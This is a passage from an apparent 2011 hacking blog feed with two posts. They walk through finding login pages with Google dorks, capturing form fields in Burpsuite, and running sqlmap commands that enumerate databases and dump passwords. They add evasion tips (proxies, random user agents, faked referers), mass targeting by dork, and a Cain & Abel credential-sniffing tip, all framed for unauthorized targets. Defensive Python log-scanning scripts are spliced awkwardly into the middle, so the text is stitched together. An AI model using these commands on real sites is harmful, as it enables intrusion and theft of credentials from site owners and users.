Resulting Target Found: &lt;a href="http://www.site.com/Admin/login.php"&gt;http://www.site.com/Admin/login.php&lt;/a&gt;&amp;nbsp;(take note, write it down, and close browser)&lt;br /&gt;
&lt;br /&gt;
Now it is time to use Burpsuite to help us find out the needed fields for injecting. Run the "burpsuite_v1.x.jar" file to get up and running, just double click it OR start it from the command line by using 'java -jar burpsuite_v1.x.jar' (replace "x" with your version number).&lt;br /&gt;
Burpsuite is configured by default to listen on port 8080, so you will need to configure your favorite browser to use this as the proxy address so that Burpsuite can pick up all of the traffic for analysis and examination. For most browsers you open Options or Internet Options&amp;gt;&amp;gt;Connections&amp;gt;&amp;gt;LAN Settings&amp;gt;&amp;gt;Proxy Settings&amp;gt;&amp;gt;and then set it to: 127.0.0.1:8080&amp;gt;&amp;gt;save&amp;gt;&amp;gt;and you're done.&lt;br /&gt;
&lt;br /&gt;
Now any pages you go to in your web browser will be parsed by Burpsuite; simply remove the proxy setting to go back to normal surfing. By default Burpsuite has the option "Intercept Data" set to "ON". This is helpful if you want to tamper with data for EVERY request traveling on the line. You can quickly and easily turn this off if you don't want as much interaction, as it will still save the logs for requests sent and received to the HISTORY tab. I prefer to leave it ON as I see more of what is actually going on and can simply DROP any I don't want or FORWARD to allow without very much hassle. Leave it set up for now, we will come back to this in a few...&lt;br /&gt;
&lt;br /&gt;
NOTE: you will have to do some back and forth to see the results while we test, so I suggest you just minimize or adjust your screens so you can run side by side (my preference) to save yourself time.&lt;br /&gt;
&lt;br /&gt;
Now that we have a potential target and Burpsuite running, we will start testing it with our browser to see what all is captured. Surf to the login page found with our Google Dorks earlier and watch as Burpsuite starts to blink for user interaction. Assuming you have the default behavior, you will need to "FORWARD" or "DROP" the requests as they are sent and received. This equates to allow or drop in simple terms. You can review the actual details of what is being sent in the RAW tab window (you change tabs to view different aspects of what is being sent/received). Let us try entering "logintest" in the login field and "passtest" in the password field, then submit. Obviously this is not going to get us into the site, unless you are just a really lucky guesser, BUT it will help us get one step closer to accomplishing that task. You will see the request come through Burpsuite again; FORWARD the request to allow it to run through the full authentication cycle. Now let's review the results from that simple request we just sent...&lt;br /&gt;
&lt;br /&gt;
In Burpsuite navigate to the HISTORY tab, two to the right of the main INTERCEPTOR tab we have been working from since we started. The HISTORY tab will outline all of the details that were captured when we sent the login request to our target site.&lt;br /&gt;
&lt;br /&gt;
You should see one or two $GET requests which were sent from you when you were actually navigating to the target site, and then you should find a $POST request from when we actually submitted the login page/form. This is the one we are actually interested in. Highlight the $POST request in the history tab and you can view the specifics down below in the RAW tab window. This is a view of the $POST request sent, if you look through it (likely near bottom) you will notice the actual post parameters&amp;nbsp;sent for the form fields we entered (testlogin &amp;amp; passtest). &lt;br /&gt;
&lt;br /&gt;
It should look something like this:&lt;br /&gt;
&amp;nbsp;POST /Admin/login.php HTTP/1.1&lt;br /&gt;
&amp;nbsp;Host: &lt;a href="http://www.site.com/"&gt;http://www.site.com/&lt;/a&gt;&lt;br /&gt;
&amp;nbsp;Proxy-Connection: keep-alive&lt;br /&gt;
&amp;nbsp;Referer: &lt;a href="http://www.site.com/Admin/login.php"&gt;http://www.site.com/Admin/login.php&lt;/a&gt;&lt;br /&gt;
&amp;nbsp;Cache-Control: max-age=0&lt;br /&gt;
&amp;nbsp;Origin: &lt;a href="http://www.ostergottesdienste.de/"&gt;http://www.ostergottesdienste.de/&lt;/a&gt;&lt;br /&gt;
&amp;nbsp;User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24&lt;br /&gt;
&amp;nbsp;Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
&amp;nbsp;Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5&lt;br /&gt;
&amp;nbsp;Accept-Encoding: gzip,deflate,sdch&lt;br /&gt;
&amp;nbsp;Accept-Language: en-US,en;q=0.8&lt;br /&gt;
&amp;nbsp;Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3&lt;br /&gt;
&amp;nbsp;Cookie: sid=a3b362a522444335b693ab04007ebbed&lt;br /&gt;
&amp;nbsp;Content-Length: 133&lt;br /&gt;
&amp;nbsp;_auth_username=testlogin&amp;amp;_auth_password=testpass&amp;amp;Submit_button=Submit&lt;br /&gt;
&lt;br /&gt;
*Notice* the "_auth_username=testlogin" &amp;amp; "_auth_password=testpass". These are the $POST fields we just sent; these field names may vary from site to site, so please stay with me if yours are a little different.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Note the cookie field to see if it is of any value, as the cookie and user-agent fields are also injectable (to be covered in another article).&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; *PRO TIP*: If you use tools like Cain &amp;amp; Abel you can use this method to add to the "HTTP_PASS_FIELDS.LST" &amp;amp; "HTTP_USER_FIELDS.LST" files, to increase your chances of catching credentials while pulling off MiTM attacks, as you can add the form fields it looks for.&lt;br /&gt;
&lt;br /&gt;
OK, now that we know the $POST variables we will be working with, it is time to start up SQLMAP. Open a command prompt and type in 'sqlmap.py' (see previous posts regarding how to set environment variables to avoid having to navigate to the install folder).&amp;nbsp; Now that SQLMAP is up we will start feeding it the data we found in the steps above (_auth_username=&amp;amp;_auth_password=&amp;amp;Submit_button=). We need to tell it that we want to use the $POST method to inject the website, by issuing the '--data' argument followed by the $POST fields we found using Burpsuite: "_auth_username=" &amp;amp; "_auth_password=".&lt;br /&gt;
&lt;br /&gt;
NOTE: $GET requests are sent by SQLMAP by default, but when you issue the '--data' argument it is smart enough to switch to $POST, triggered by your supplying those $POST parameters with the '--data' argument. The fields passed are then tested for SQL injection, as well as any GET parameters provided that would normally be tested.&lt;br /&gt;
&lt;br /&gt;
EX: sqlmap.py -u &lt;a href="http://www.site.com/Admin/login.php"&gt;http://www.site.com/Admin/login.php&lt;/a&gt; --data "_auth_username=test&amp;amp;_auth_password=test&amp;amp;Submit_button=Submit"&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;*PRO TIP* If you know, or only want to test, certain fields then only include the ones you want (i.e. _auth_password only). If you started a scan and it doesn't look like the field is injectable you can hit 'CTRL+C' to pause and then hit 'N+ENTER' to skip to the next field and start testing it. This can save you from spending unnecessary time.&lt;br /&gt;
&lt;br /&gt;
Once confirmed that you have found an injection point, we can add arguments we learned from our previous introductions to find crucial information. We transform the above command into the following:&lt;br /&gt;
EX: sqlmap.py -u &lt;a href="http://www.site.com/Admin/login.php"&gt;http://www.site.com/Admin/login.php&lt;/a&gt; --data "_auth_password=test" --current-user --current-dba --users --dbs --is-dba&lt;br /&gt;
&lt;br /&gt;
Once we have processed the results we will check for passwords, using the '--passwords' argument, and see if we can get any...&lt;br /&gt;
EX: sqlmap.py -u &lt;a href="http://www.site.com/Admin/login.php"&gt;http://www.site.com/Admin/login.php&lt;/a&gt; --data "_auth_password=test" --passwords&lt;br /&gt;
NOTE: this assumes you have gone in order, as it will read the session file already created and skip things like (--users) which normally accompany this command argument...&lt;br /&gt;
&lt;br /&gt;
You can continue enumerating the database for more details on tables, columns, etc but that was already covered in my two original posts on SQLMAP so I will not go into any more details on how to dump the database. If you are super lazy and this was too complex for you, then you can use the easy way out as covered in my mini-tutorial at the end of SQLMAP Tips &amp;amp; Tricks article (--forms).&lt;br /&gt;
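Seen from the server side, the '--data' runs above produce login POSTs whose field values carry injection syntax and, unless the user-agent is changed, sqlmap's own User-Agent string. The script below is an added example (not part of this post, sqlmap or Burpsuite) that scans captured form submissions shaped like the Burp history above; the requests and the sqlmap-style User-Agent are constructed, and the probe patterns are the common boolean-, time- and UNION-based signatures rather than sqlmap's actual payload list.&lt;br /&gt;

```python
"""Flag sqlmap-style injection probes in captured POST form submissions
(added example, not code from sqlmap or Burpsuite)."""
import re
from urllib.parse import parse_qs, urlencode

# Constructed requests in the shape of the Burp history above, not real
# traffic.  Bodies are built with urlencode so the raw string is what a
# reverse proxy or WAF log would store.
SAMPLE_REQUESTS = [
    # The manual test login from the walkthrough: nothing suspicious.
    {"method": "POST", "path": "/Admin/login.php",
     "user_agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24",
     "body": urlencode([("_auth_username", "testlogin"),
                        ("_auth_password", "testpass"),
                        ("Submit_button", "Submit")])},
    # Boolean-based probe sent with a sqlmap-style User-Agent (constructed).
    {"method": "POST", "path": "/Admin/login.php",
     "user_agent": "sqlmap/0.9 (http://sqlmap.sourceforge.net)",
     "body": urlencode([("_auth_username", "test"),
                        ("_auth_password", "test' AND 1=1 AND 'a'='a"),
                        ("Submit_button", "Submit")])},
    # Time-based probe behind a browser User-Agent: only the body gives it away.
    {"method": "POST", "path": "/Admin/login.php",
     "user_agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/4.0",
     "body": urlencode([("_auth_password", "test' AND SLEEP(5)-- "),
                        ("Submit_button", "Submit")])},
    # Plain page view, no body to inspect.
    {"method": "GET", "path": "/index.php", "user_agent": "Mozilla/5.0",
     "body": ""},
]

# Textbook probe signatures, each checked against a decoded field value.
PROBE_PATTERNS = {
    "boolean_blind": re.compile(r"\b(and|or)\b\s+[\w']+\s*=\s*[\w']+", re.I),
    "time_blind": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I),
    "union": re.compile(r"\bunion\b[\s\S]{0,40}\bselect\b", re.I),
    "comment_terminator": re.compile(r"--\s|#|/\*"),
}


def analyse_request(req):
    """Return a finding for one request, or None when nothing stands out."""
    hits = []
    if req["method"] == "POST" and req["body"]:
        # parse_qs undoes the form encoding, so patterns see the real values.
        fields = parse_qs(req["body"], keep_blank_values=True)
        for name, values in fields.items():
            for value in values:
                kinds = sorted(k for k, rx in PROBE_PATTERNS.items()
                               if rx.search(value))
                if kinds:
                    hits.append({"field": name, "kinds": kinds})
    tool_user_agent = "sqlmap/" in req.get("user_agent", "").lower()
    if not hits and not tool_user_agent:
        return None
    return {"path": req["path"], "tool_user_agent": tool_user_agent,
            "fields": hits}


def scan_requests(requests):
    """Findings for every suspicious request, in capture order."""
    return [f for f in (analyse_request(r) for r in requests) if f is not None]


def fields_under_attack(findings):
    """Distinct form field names that received probes: the list to review on
    the server side (parameterised query? input length limit?)."""
    names = {h["field"] for f in findings for h in f["fields"]}
    return sorted(names)


if __name__ == "__main__":
    found = scan_requests(SAMPLE_REQUESTS)
    for finding in found:
        print(finding)
    print("fields probed:", fields_under_attack(found))
```

Matching on the User-Agent alone misses the third request, which is why the body check is the one that matters.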
&lt;br /&gt;
I hope you have enjoyed this little twist to your standard injection techniques, and hope you walk away remembering to leave no rock unturned in your search for vulnerabilities and injection points. I will try to include more in depth coverage on Burpsuite and its other functionalities and how else it can be used in future articles, but I encourage you in the meantime to please dig around in it and try to get creative.&lt;br /&gt;
&lt;br /&gt;
Later,&lt;br /&gt;
H.R.
</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/2367849738517970986/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/05/this-aint-your-standard-get-request.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/2367849738517970986?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/2367849738517970986?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/9SUxUQQvDY4/this-aint-your-standard-get-request.html" title="This ain't your standard $GET request!" 
/><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/05/this-aint-your-standard-get-request.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkQHRX45fip7ImA9WhZXFUo.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-222738385912519542</id><published>2011-05-05T00:44:00.001-05:00</published><updated>2011-05-05T00:45:34.026-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-05-05T00:45:34.026-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="SQL Tools" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL Injection Tools" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="Database Takeover" /><category scheme="http://www.blogger.com/atom/ns#" term="SQLi" /><category scheme="http://www.blogger.com/atom/ns#" term="Database" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL" /><category scheme="http://www.blogger.com/atom/ns#" term="sqlmap" /><title>SQLMAP Volume 2: TIPS &amp; TRICKS</title><content type="html">1) You need to be safe, so this is crucial. I assume you already have a trusted VPN connected and now to be extra ninja we are also going to route traffic through proxies. We can accomplish this by simply setting the '--proxy=PROXY' parameter which will enable use of proxies during scanning. &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; EX: sqlmap.py -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt; --proxy=http://proxysite.com:PORT&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; You can also supply credentials with the '--proxy-cred=user:pass' argument&lt;br /&gt;
&lt;br /&gt;
2) You can speed up scans by increasing the THREAD count, since the default is set to 3 requests at a time.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2a) If you set this beyond the default you may also want to set the '--delay=DELAY' parameter to allow some strategic delays between requests (or to speed up even further, although I have a feeling this leads to the errors which other tools are prone to (cough..Havij)).&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2b) You can use the '-o' switch to enable all of the optimization features at once.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2c) If you are performing time-based attacks or blind injections then it may be a better idea to leave the thread count alone and use the '--predict-output' argument, which will save you a bit of time and will allow SQLMAP to perform some analysis on the results found in the session file to help speed things up (it can slow things down in other scenarios, where the '-o' option is the much better choice).&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
3) You can have the tool load different USER-AGENTS in case a site or page has restrictions based on browser type. This can be accomplished by adding the '-a &amp;lt;insert/path/to/file&amp;gt;' parameter to your command string. It needs to be followed by the path to the file containing the USER-AGENTs to be used. You can run a few searches on Google to find some common ones or how to come up with your own custom USER-AGENT. NOTE: this may have been replaced by --user-agent=&amp;lt;insert user agent details&amp;gt; with latest update&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3a) there is a default list provided with the installation that you can add to, or look at to see how they are modeled, located at: '~\sqlmap\txt\user-agent.txt'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; *3b) you can also just let SQLMAP do the deciding by issuing the '--random-agent' switch&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
4) If you need to fake out the referer in the request due to restrictions on the server side, you can change the default value by using '--referer=&amp;lt;http://www.insert/REFERER/page/.com/&amp;gt;'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
5) Need credentials to perform a more in-depth scan? No problem! We can set the credentials using '--auth-cred' followed by the credentials in the typical 'user:pass' format &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; EX: --auth-cred=user:password&amp;nbsp; or&amp;nbsp; --auth-cred=admin:IhazYourPazword! &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
6) You can load targets using GOOGLE and DORKS, by using the '-g' argument followed by the search dork in quotes ""&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; EX: sqlmap.py -g "inurl:index.php?id= site:us" &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: It will work on any targets found in an interactive manner, but only the arguments passed with the original command will be used on each target, so make sure you use some basics but not too much.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; EX: sqlmap.py -g "inurl:index.php?id=" -b --current-user --current-db --is-dba --dbs&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;6a) You can also process more than one site request at a time from a file by changing&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; the standard&amp;nbsp;'-u' to '-r &amp;lt;path/to/load/HTTP/requests/from/&amp;gt;'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
7) You can save and resume scans and the data retrieved in a session file (in the "output" folder) to save time, or to pick things back up where you last left off. You need to use the '-s &amp;lt;insert/path/to/session/file&amp;gt;/session' parameter to tell it where to look to parse results from.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: Point it directly at the session file and not just the folder it is in, or it &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; won't load properly.&lt;br /&gt;
You can also use the recorded scan details to learn a LOT. It contains info on the queries used to get all the details as well as everything found, so it is a good reference and learning tool (all dumps are converted to .CSV files which are above and beyond the log and session files that are saved). &lt;br /&gt;
&lt;br /&gt;
8) You can use the '--eta' parameter to have the scans keep an ETA so you have an idea of how long things are going to take. This comes in handy when dumping a database, giving you an idea of how long it thinks it will take (very useful when blind, or when deciding whether it makes sense to dump a questionable table in full or just what you need). Remember, if it looks like it will take too long you can use the '-s' argument to pick it back up later (see step 7 above).&lt;br /&gt;
&lt;br /&gt;
9) You can use '--flush-session' to clear out the results stored for a session file if you need to just start over, or in case the admin has come along and made some changes since your last visit ;)&lt;br /&gt;
&lt;br /&gt;
10) The last one I will leave you with is very important if you are working on a Linux machine, like BackTrack: make sure you have the latest version of SQLMAP, as it is constantly being worked on and new developments are constantly being released. This can be accomplished by a quick addition of the '--update' argument.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; EX: sqlmap.py --update&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: if you are working on Windows then you can either check the SQLMAP&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; homepage often for an updated version to download, or you can try the Windows SVN&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; GUI client called TortoiseSVN, which can be found here and is available for both 32&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; and 64 bit computers: &lt;a href="http://tortoisesvn.net/"&gt;http://tortoisesvn.net/&lt;/a&gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; You just download and install, then navigate to the SQLMAP install folder in&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Windows Explorer and you will now have a green icon next to those folders&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; that can be updated by SVN. Just right click and choose the option to&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; SVN Update the folder contents. Once it is done you have an updated copy.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
BONUS Material:&lt;br /&gt;
1) When attacking version 4 databases with no information schema to rely on, there are still several options with SQLMAP:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1a) You can use the '--common-tables' and '--common-columns' arguments to try and bruteforce the table and column names. The default list is much greater than Havij and other tools and can easily be added to if you want to beef it up; this list, along with many others the tool uses, can be found at: ~\sqlmap\txt\*.txt&lt;br /&gt;
&lt;br /&gt;
2) If you don't get any positive results from injection but you have a gut feeling that the site is vulnerable, then you can try increasing the '--level' or '--risk' arguments beyond the default level of 1. When you do this it will allow SQLMAP to perform more intense attacks and check for additional injection points such as the cookie field, user-agent field, and even the referer field. I typically will add '--level 3 --risk 3' to my command string if I don't get what I am looking for and have a strong feeling there is an injection point that is somehow being overlooked. &lt;br /&gt;
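Turning the '--level' point around for the defender: the following is an added example, not code from this blog or from the sqlmap project, that scans constructed Apache combined-format access log lines for the probing described in this post. It looks for injection patterns in the query string and, because level 3 also tests the Referer and User-Agent headers, in those headers too, plus the tool's default 'sqlmap/' User-Agent (assumed not to have been overridden) and the request hammering that one-character-at-a-time blind extraction produces. All log lines, addresses, regexes and the repeat threshold are constructed for illustration.

```python
"""Constructed example: spot sqlmap-style SQL injection probing in web access logs."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "combined" format: ip ident user [time] "METHOD path proto" status bytes "referer" "user-agent".
# Groups: 1 ip, 2 timestamp, 3 method, 4 path, 5 status, 6 referer, 7 user-agent.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$'
)

# Probe patterns in the spirit of what an injection scanner sends at the default and raised
# --level/--risk: boolean tests, UNION column counting, time-based delays, comment terminators.
SQLI_RE = re.compile(
    r"(union\s+(all\s+)?select|\b(and|or)\s+(\d+|'[^']*')\s*=\s*(\d+|'[^']*')|sleep\s*\(|benchmark\s*\("
    r"|information_schema|'\s*(--|#)|/\*.*\*/|\bwaitfor\s+delay\b|@@version|order\s+by\s+\d+)",
    re.IGNORECASE,
)

# sqlmap's default User-Agent begins with "sqlmap/" unless --user-agent, --random-agent or
# --mobile is used (assumption: the operator did not override it).
SQLMAP_UA_RE = re.compile(r"^sqlmap/", re.IGNORECASE)

# Blind extraction costs one request per character, so one client hammering a single
# parameterised path many times is itself a signal. Constructed tuning value.
REPEAT_THRESHOLD = 5

# Constructed sample log: one ordinary visitor, one scanner, one malformed line.
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Aug/2011:14:49:01 -0500] "GET /index.php?id=2 HTTP/1.1" 200 5120 "http://site.example/" "Mozilla/5.0 (Windows NT 6.1)"',
    '198.51.100.7 - - [19/Aug/2011:14:49:05 -0500] "GET /about.html HTTP/1.1" 200 2048 "http://site.example/index.php?id=2" "Mozilla/5.0 (Windows NT 6.1)"',
    # scanner probing the id parameter with the tool's default User-Agent
    '203.0.113.5 - - [19/Aug/2011:15:02:10 -0500] "GET /index.php?id=1%27%20AND%201%3D1--%20 HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '203.0.113.5 - - [19/Aug/2011:15:02:11 -0500] "GET /index.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL-- HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    # same client, now with a browser User-Agent, probing the Referer header (a --level 3 style test)
    '203.0.113.5 - - [19/Aug/2011:15:05:40 -0500] "GET /index.php?id=1 HTTP/1.1" 200 5120 "http://site.example/index.php?id=1%27%20AND%20SLEEP(5)--" "Mozilla/5.0 (Windows NT 6.1)"',
    '203.0.113.5 - - [19/Aug/2011:15:05:46 -0500] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1)"',
    '203.0.113.5 - - [19/Aug/2011:15:05:47 -0500] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1)"',
    # unparseable line: skipped rather than crashing the run
    "garbage line that is not in combined format",
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    ip, ts, method, path, status, referer, ua = m.groups()
    return {"ip": ip, "ts": ts, "method": method, "path": path,
            "status": int(status), "referer": referer, "ua": ua}


def probe_fields(rec):
    """Return the names of the request fields carrying an injection probe.

    The query string is the obvious place, but a raised --level also tests the
    User-Agent and Referer headers (and cookies, which need a custom LogFormat to be
    logged at all), so those headers are inspected as well.
    """
    hits = []
    query = rec["path"].partition("?")[2]
    if query and SQLI_RE.search(unquote_plus(query)):
        hits.append("query")
    if SQLI_RE.search(unquote_plus(rec["referer"])):
        hits.append("referer")
    if SQLI_RE.search(unquote_plus(rec["ua"])):
        hits.append("user-agent")
    if SQLMAP_UA_RE.match(rec["ua"]):
        hits.append("sqlmap-ua")
    return hits


def analyse(lines):
    """Per client IP: which fields were probed, and which paths were hit at least REPEAT_THRESHOLD times."""
    findings = defaultdict(lambda: {"fields": set(), "paths": defaultdict(int)})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = findings[rec["ip"]]
        entry["paths"][rec["path"].partition("?")[0]] += 1
        entry["fields"].update(probe_fields(rec))
    report = {}
    for ip, entry in findings.items():
        hammered = sorted(p for p, n in entry["paths"].items() if n >= REPEAT_THRESHOLD)
        if entry["fields"] or hammered:
            report[ip] = {"fields": sorted(entry["fields"]), "hammered": hammered}
    return report


if __name__ == "__main__":
    for ip, info in analyse(SAMPLE_LOG).items():
        print(f"{ip}: probed fields={info['fields']} hammered paths={info['hammered']}")
```

On the sample above only 203.0.113.5 is reported, flagged on the query string, the Referer header and the default User-Agent, with /index.php listed as hammered; the ordinary visitor produces no finding.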
3-X) Updates recently introduced:&lt;br /&gt;
'&amp;nbsp;--batch' allows you to walk away from the terminal and let SQLMAP make all of the decisions on your behalf for all instances where it would usually prompt for interaction, a true hands-free experience&lt;br /&gt;
' --schema' which can be used to enumerate the databases or schema&lt;br /&gt;
' --parse-errors' which tells SQLMAP to parse the error messages from response pages received from queries - helpful when using Google dorks&lt;br /&gt;
